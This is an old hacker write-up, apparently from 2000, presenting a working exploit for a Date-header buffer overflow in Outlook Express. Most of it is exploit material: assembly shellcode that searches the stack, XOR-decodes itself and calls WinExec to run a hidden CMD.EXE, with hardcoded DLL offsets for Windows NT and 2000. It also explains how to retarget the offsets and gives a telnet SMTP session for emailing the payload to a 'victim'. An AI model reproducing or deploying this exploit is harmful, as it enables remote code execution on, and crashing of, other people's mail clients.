------------- OutLook Date Header Xploit. -----------------
 
(First i am apologize for my broken english, if you want this text in pure spanish :)
i will send you , sure that it would be more easy to understand. 
Anyway this is an exploit info, so who cares about the rest)


This program create and send the code needed to exploit
the Date buffer overflow exploit in the OutLook.

The file created (XPLOIT.TXT) looks something like this:

-------------------------------------------------
Date: Thu, 13 Jun 2000 12:33:16 +1VZ-A蠷@B9uf-R+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'p1111

RY-Af9AAt1پ[--fI+-[-+fI+[-fIfIʳٸ+_߳-_+Ϧ_-_AA
--------------------------------------------------

There are 5 txt files, with the code splitted, if join all together you
have the above code.


CODE0.TXT      
		---------------------------------
		push esi  // This will be the position of eip after the CALL ESI   
			  // somewhere in the outlook stack
		pop edx
  		add edx,10
 	 	mov eax,$EAFAFF8A    
 	    	inc eax           // Mark where the code begins 
	@bucle:
 	   	inc edx
 	    	cmp ds:[edx],eax
  	   	jnz  @bucle
 	    	add dx,4
  	  	push edx
   		ret         // With this jump to the begin of the CODE1.TXT
	
		---------------------------------

		First part of the code, basically search in the stack for the 
		rest of the code, and then go to there. 
		

OFFSET_NT.TXT
		---------------------------------
		ED,27,BD,70    ----- Offset of any CALL ESI in the Kernel32.dll
		---------------------------------
		This is a small file with the offset of any Call ESI some load DLL
		There are 3 files, each system (nt,w2k or w9x) have a differente offset
		If the xploit doesnt run at first time, or you obtain an error message
		when the outlook try to download the message, maybe they have a diferent
		version of dll (The offset i found was for NT Sp6 and W2k Englsh version)
		Anyway , you can try to find a Call ESI with any debug in your windows 		version)
CODE1.TXT	
		-----------------------------------
		@mcode: DB $8B,$FF,$FA,$EA  // Mark where the code begins

		@code:
 		     push edx
		     pop ecx
 		     add ecx,17
		@b3:
 		    inc ecx
 		    cmp word ptr ds:[ecx],$4141  // desencryp until an 4141h 
 		    je @ini_code
 		    xor byte ptr ds:[ecx],$99
		    jmp  @b3

		@ini_code:

		-----------------------------------
		Here is the code for the rest of the exploit, desencryp the payload
		and the command line (code3.txt), this is necesary, becouse in the buffer
		you can not have null bytes.
CODE2.TXT	
		-----------------------------------

	        add edx,45+$12    // offset of the Kernel21.dll string

		mov eax,ds:[$01001014] // Offset of GetModuleHandle
   		push edx              
     		push edx
     		call eax     // Call GetModuleHandle API
     		pop edx
     		push edx
     		add edx,13 // Offset of WinExec string

     		push edx    // EAX ModuleHandle
     		push eax
     		mov eax,ds:[$01001038] // Offset of GetProcAddress
     		call eax      // Call GetProcAddress API
     		pop edx

     		add edx,21 // Offest buffer
     		push 00h   // SW_HIDE -- Change this for an 0Ah if you want that your
			   // the command line will be visibled. 
			   // look for an F3h,99h,CBh and change the 99h for an 93h
			   // (0Ah xor 99h=93h) in the CODE2.TXT     
     		push edx
     		call eax   // Call WinExec API


		mov eax,ds:[$01001010] // Offset of ExitProcess in the import table
		call eax   // Call ExitProcess

 
     		@kernel: db 'Kernel32.dll',0
     		@api1:   db 'WinExec',0

		-----------------------------------
		Payload. Here the code call 3 APis of windows.
		He needs to find the address of WinExec so he call to GetProcAddress
		and GetModuleHandle (The address of this two APIs is taken for the own
		import table of the OutLook) The exploit can run perfect with other versions
		of OutLook (Outlook 2000) but you must have the address of GetProcAdress, 
		GetModuleHander and ExitProccess, (is easy find the offset with any program
		who show you the import table of an exe file)
		When you have that address (something like 01001000h, 01001038h, etc) you
		must encryp it with 99h and put in this part of the code.

CODE3.TXT       
		-----------------------------------
		FA F4 FD B7 FC E1 FC 99 41 41           -- This is CMD.EXE plus 4141h
		-----------------------------------	   all the bytes with  XOR 99h

		This is you command line, when the program read this file and encrip it with
		99h, (a simple XOR 99h), you can create your own file with the command line
		but be sure you xor it with 99h and add at the end of file the 4141h (This
 		two bytes are used to find the end of the code when he desencryp the code,
		
		The command line have to finish with a CR+LR (0Dh,0Ah), this is becouse
		the program use this 2 bytes to write the 4141h to mark where is the finish	
		of the string.
		

The program create a file called XPLOIT.TXT, if you want to send an email you must copy and paste
the content of this file after the DATA command in any SMTP session.

sample:
	telnet any.smtp.server 25
	220 localhost(127.0.0.1) SMTP MAIL Jun 22 2000/20:35:11; Sun, 13 Aug 20
	HELO
	250 localhost Hello localhost, welcome! 
	MAIL FROM: dubi@dubi.duuu
	250 <DUBI@DUBI.DUU.CO.UK>... Sender ok
	RCPT TO: lamer@lamerland.com 
	250 <lamer@lamerland.com>... Recipient ok
	DATA
	354 Enter mail, end with "." on a line by itself
         
	<here paste the code from the file XPLOIT.TXT>
	 
	.
	250 3996C380.0000002A Message accepted for delivery     
	QUIT


I test the exploit with Windows 2000, Windows NT 4 SP6, and Windows 98.
All the 3 systems with Outlook Express, and it work fine.
There are 2 points why the exploit could not run, the offset of any CALL ESI (find for one with some debug)
and the offset of the 3 APIS (winexec, getmodulehandle an getprocessaddress) of the
outlook exe import table.
I think it easy to find this offsets in your system for any version of outlook.

Anyway if the exploit doesnt run, sure that you fuck the mailbox of the victim
because the outlook crash when try to understand the Date header.
       
ThX to <dark spyrit> for his Win32 Buffer Overflows (Location, Exploitation and Prevention) 

fbyte@mailcity.com